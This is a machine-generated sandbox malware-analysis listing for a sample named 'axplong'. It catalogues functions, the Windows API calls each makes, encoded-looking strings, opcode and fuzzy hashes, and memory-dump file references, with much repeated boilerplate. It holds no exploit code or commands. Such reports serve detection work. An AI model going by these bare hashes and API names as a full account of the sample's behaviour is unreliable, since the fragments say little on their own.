Opcode Fuzzy Hash: 17739f8965073ab67ac339012a26448a346e0495bf676121e21ac1fbde995f78
Instruction Fuzzy Hash: 3DE1AD71910228ABEB24DFA4CC8DBDEB779AF04304F5042D9E509A7291DB74ABD4CF91

Function 00267D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00267EA3

Strings

JmpxQb==, xrefs: 002681B2
JmpxRL==, xrefs: 00268062
JmpyPb==, xrefs: 0026810A

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: 28a77a09f03d8359f68cdd41c3fb3910bbf7c803be1a9a7a67758519b92abd6c
Instruction ID: 145531481c8724a14c2f96e1c781403e6bd131e138bd85af365be7a1ae0573d3
Opcode Fuzzy Hash: 28a77a09f03d8359f68cdd41c3fb3910bbf7c803be1a9a7a67758519b92abd6c
Instruction Fuzzy Hash: F1D10370E206549BDF14BB68DC5A7AD7761AB42324F90428CE8196B3C2DF354EE48BD2

Function 00296E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00296E23
GetFileInformationByHandle.KERNEL32(?,?), ref: 00296E7D
__dosmaperr.LIBCMT ref: 00296F12

Part of subcall function 00297177: __dosmaperr.LIBCMT ref: 002971AC

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 1eb40953730a9351384be3bb2ad9a7df34f1e05189483ecc3d0f75a47318de23
Instruction ID: 944644042c608307f9daebfe6eee05542b1538610b953404a980cddc1a1ece2b
Opcode Fuzzy Hash: 1eb40953730a9351384be3bb2ad9a7df34f1e05189483ecc3d0f75a47318de23
Instruction Fuzzy Hash: 00415D75920705ABDF24EFB5EC459AFBBF9EF88300B10442DF856D3611EA30A914CB61

Function 00296C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15fd121a6fa3e478797eaebdc76b0f04fb4e3cc6349bf45a88ce79defb279019
Instruction ID: c54652c65201c4b85b30923d4066578635316ca087939b8589e56e2079dd3a8d
Opcode Fuzzy Hash: 15fd121a6fa3e478797eaebdc76b0f04fb4e3cc6349bf45a88ce79defb279019
Instruction Fuzzy Hash: 06210A71A252087AEF117F649C46FAF37A99F42778F100311F9343B1D1DB705E269AA1

Function 002682B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00268454

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 1fcf0b3739f3bcbe5804f03b829c593bd487e48d066449c9d0d67367c114a9cc
Instruction ID: 1032092aaf6c41e4014f4bc65014043a7692016b13287f8c2aef30613bcc1622
Opcode Fuzzy Hash: 1fcf0b3739f3bcbe5804f03b829c593bd487e48d066449c9d0d67367c114a9cc
Instruction Fuzzy Hash: CB5127709202199BEB24EF68CD45BEDB775AB45304F504399E808A73C1EF709AE08B91

Function 00296F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00296FB3

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 95322619ee5ee258ec0745a1afe3fcba1ab7e3797d99f0abf9afec6cebbda325
Instruction ID: c9748d34289a994af7cc22aa2ffe1887565b81293708308b1fddd0439ef28a58
Opcode Fuzzy Hash: 95322619ee5ee258ec0745a1afe3fcba1ab7e3797d99f0abf9afec6cebbda325
Instruction Fuzzy Hash: EC111CB291020DAADF01DED5D988EDFB7FCAB08310F205266E516E2180EB70EB54CB61

Function 0029AF0B Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,F1304D82,?,?,0027D32C,F1304D82,?,002778FB,?,?,?,?,?,?,00267435,?), ref: 0029AF3E

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 34d2dec7be9ef68757004cc3999b1233aba091d7dcc676da8248354309360df4
Instruction ID: d397a741c9f1600ce4ba41343fafe4407a54dfc9a988988d43c73b6d87bed391
Opcode Fuzzy Hash: 34d2dec7be9ef68757004cc3999b1233aba091d7dcc676da8248354309360df4
Instruction Fuzzy Hash: 5FE02B7223631356DF203A265C05B6B35CC9F423F1F050061AC0892880CF66CC3049E3

Function 04F40760 Relevance: 1.3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X``Q, xrefs: 04F4076B

Memory Dump Source

Source File: 00000007.00000002.4593970770.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f40000_axplong.jbxd

Similarity

API ID:
String ID: X``Q
API String ID: 0-515586484
Opcode ID: 8ab8e127f1eba66aaac524f38295e6cb3dc71ca4651bc564075dff244c43d093
Instruction ID: bcc141d6c7ff1412a76151c306887752716c5f30ef9dde2d6e1394181fb5e505
Opcode Fuzzy Hash: 8ab8e127f1eba66aaac524f38295e6cb3dc71ca4651bc564075dff244c43d093
Instruction Fuzzy Hash: 6DF02793249120AED24202525AD12F76F58A7D3A713304162F64786582ED491747A973

Function 00276AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00276B65

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 425f4f312cb3022e895a03524b49bc1b9ea9283d83bb93906fb8397200c2c0df
Instruction ID: 9f0d09109f26f903504d01bfc2c0cf4aef8fa60211625a5eefdc7198cad82f6d
Opcode Fuzzy Hash: 425f4f312cb3022e895a03524b49bc1b9ea9283d83bb93906fb8397200c2c0df
Instruction Fuzzy Hash: DAF0F931E20614EBC700BBA8DC07B1D7B74AB07764F904748E825672D1DB705A248BD3

Function 04F406B9 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4593970770.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e0f7e753c7f78646eff5aac32e2054fb700b0f13b7a57ee0f99331d80959b7
Instruction ID: 271778babe0064c771cb68d3eaba07216712904c6ff021af6bcc87156c7dd220
Opcode Fuzzy Hash: 73e0f7e753c7f78646eff5aac32e2054fb700b0f13b7a57ee0f99331d80959b7
Instruction Fuzzy Hash: 15212BA320D250AEE78296615AC49B67F68EBC3330331445BF183CA541FD552E47EA73

Function 04F406A7 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4593970770.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 684156814a04f3129334581378b369be4202a800ad2ed25e2080ff6f4869cd16
Instruction ID: a8ccf118a728dade1ff038198b3ce22dc4352580d9ba1fc951f9648f9efea53b
Opcode Fuzzy Hash: 684156814a04f3129334581378b369be4202a800ad2ed25e2080ff6f4869cd16
Instruction Fuzzy Hash: C401A1E734D110BDA18241455A90AB66F6DE7D36703308516F607C6A42FE992E4B7933

Function 04F40704 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4593970770.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c64aa86bcd6fb210b3992316cb1d1d6424370c121461d5d92e455cb70bd44403
Instruction ID: 1a13a1580915c88509b1b43e5ff62eb62ba1064d32755e01772cf4023322838d
Opcode Fuzzy Hash: c64aa86bcd6fb210b3992316cb1d1d6424370c121461d5d92e455cb70bd44403
Instruction Fuzzy Hash: CA0124B334C210BEF282825156C46B63FA9F7D3770720842AF603C6941FE592A47B933

Function 04F406E9 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4593970770.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26885bef66dd1df4a08e771c6974e51fcac4412aa97e73f73885fb77a88cac03
Instruction ID: fadd5bc20875604ca7e3feebc8140e96f2d7313272cc48dbe77f983fa85233da
Opcode Fuzzy Hash: 26885bef66dd1df4a08e771c6974e51fcac4412aa97e73f73885fb77a88cac03
Instruction Fuzzy Hash: 6A01F2E730D110BDE28242512AC4AF27F68E7C36713304566F607CAA42FE492A47BA33

Function 04F4072E Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4593970770.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58b88796237be660a45bc00b6f7df3bf52c8ab8f8b1250245bef09bee2d8b2d2
Instruction ID: 092acbbe83d0dd848e246801c86942c6f9a6d191f97f00517a4a1bd739f1aca8
Opcode Fuzzy Hash: 58b88796237be660a45bc00b6f7df3bf52c8ab8f8b1250245bef09bee2d8b2d2
Instruction Fuzzy Hash: D0F040A320C110EDA242421226D0AB67FA8F3C3A303704526F607CB901FE5A2B4BFD73

Function 04F4071F Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4593970770.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936516c19e92c2bd0a907a7b20ee87181743aaa8264dd46714d0f9b0a1f8ecf0
Instruction ID: d453887826b690d3560b0df0cbde7e232933feb2db2243eb5a9f4cdee1479fe6
Opcode Fuzzy Hash: 936516c19e92c2bd0a907a7b20ee87181743aaa8264dd46714d0f9b0a1f8ecf0
Instruction Fuzzy Hash: 67F02BB330D210EDE242860166D06F67F98F7C36303304556F607C6501FE59264BBA33

Function 04F40737 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4593970770.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c74d444efcdd47309c3676964c650319a81078fe5544548e9c42811ec0bf65
Instruction ID: 69d5a6d762ef64489c8760cd30ec5f842af93be2d6b2ea882eb8db6cf54993e4
Opcode Fuzzy Hash: 00c74d444efcdd47309c3676964c650319a81078fe5544548e9c42811ec0bf65
Instruction Fuzzy Hash: 82F0F0A331C110FDE282461566D05B67FA8F7C36303304962F643CA902FE5A2A07AE73

Function 04F40777 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4593970770.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace7b1524f436950397bf253e3769828c92545757cde0172a28c085eab7dcf4f
Instruction ID: 381c31e4ae28d742129888ae69e6c7fdeed9b9232173f42533e15bb069b89ba7
Opcode Fuzzy Hash: ace7b1524f436950397bf253e3769828c92545757cde0172a28c085eab7dcf4f
Instruction Fuzzy Hash: 48F02E9320D591DEC303435159D82B17FA5FBD353033505AAF1C2C5443EE59174BAA73

Non-executed Functions

Function 002A3068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 002A31E3

Strings

1#INF, xrefs: 002A439E
1#QNAN, xrefs: 002A4381
1#IND, xrefs: 002A4373
1#SNAN, xrefs: 002A437A

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 3a5d0f516ff90795c811e35b394c5f37a249709eab62c07c2d1f5c438a2fed20
Instruction ID: 3e538124bf68dcb15c6326cec4e9fe4dedb5d6fc876beff9982c2d145ba2c337
Opcode Fuzzy Hash: 3a5d0f516ff90795c811e35b394c5f37a249709eab62c07c2d1f5c438a2fed20
Instruction Fuzzy Hash: 05C26F71E246298FDF25CE28DD447E9B3B5EB89304F1441EAE84DE7240EB74AE958F40

Function 002A2BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: ce0c53afc379289a6b166eb6cdc01949730797f12c5ca01219e911f94f2694f7
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 26F15E71E1021ADFDF14CFA8C9806AEB7B1FF49314F15826AE819A7345DB30AE55CB90

Function 0027CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0027CE82,?,?,?,?,0027CEB7,?,?,?,?,?,?,0027C42D,?,00000001), ref: 0027CB33

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: bb5c8015129eaee4730d48e1daff2cc06f419c3c6521ed0931fd4db6d2f1036d
Instruction ID: af54f29da9ae1d431603c92dc12aa399e10a8e9afaddf23b7ddf2cba1fbbaba9
Opcode Fuzzy Hash: bb5c8015129eaee4730d48e1daff2cc06f419c3c6521ed0931fd4db6d2f1036d
Instruction Fuzzy Hash: 47D02232562438A3CA122BA4BC088ADBB0DCB01B583605315FD08232208BA0AC904BD0

Function 00297D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00297EFF

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
